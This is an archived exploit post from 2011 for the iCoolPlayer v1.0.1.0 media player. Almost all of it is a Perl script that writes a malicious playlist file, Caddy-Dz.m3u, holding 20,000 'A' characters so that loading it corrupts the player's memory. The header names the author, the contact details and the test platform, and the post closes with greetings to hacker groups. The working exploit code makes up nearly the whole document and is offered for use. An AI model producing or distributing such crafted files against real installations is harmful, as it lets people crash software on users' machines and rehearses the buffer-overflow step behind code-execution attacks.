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icoolplayer v1.0.1.0 memory corruption vuln
来源:www.facebook.com/islam.caddy 作者:Caddy-Dz 发布时间:2011-08-26  
# Exploit Title: icoolplayer v1.0.1.0 memory corruption vuln
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Software Link: http://www.softpedia.com/progDownload/iCoolPlayer-Download-90136.html
# Category:: Local Exploits
# Tested on: [Windows Seven Edition Intйgral- French]

system ("cls");
system ("title Caddy-Dz...");
print "\t\t/////////////////////////////////////////////////\n";    
print "\t\t_________________________________________________\n";
print "\t\t\t icoolplayer v1.0.1.0 memory corruption vuln\n";
print "\t\t\t Exploited by Caddy-Dz \n";
print "\t\t\t Website: Exploit-ID.com \n";
print "\t\t\t Email: islam_babia[at]hotmail.com\n";
print "\t\t_________________________________________________\n";
print "\n\n";

$file = "Caddy-Dz.m3u";
$my = "A" x 20000;
print "\n\n[+] Creating file: $file ...\r\n";
sleep 1;
open(m3u, ">./$file") || die "\n\aCannot open $file: $!";
print m3u "$my";
close (m3u);
print "\n[+] file successfully created!\r\n";


# Peace From Algeria


#=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
#  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
# All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com)                     |
#  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
#  RmZ ...others                                                                              |
#============================================================================================ |

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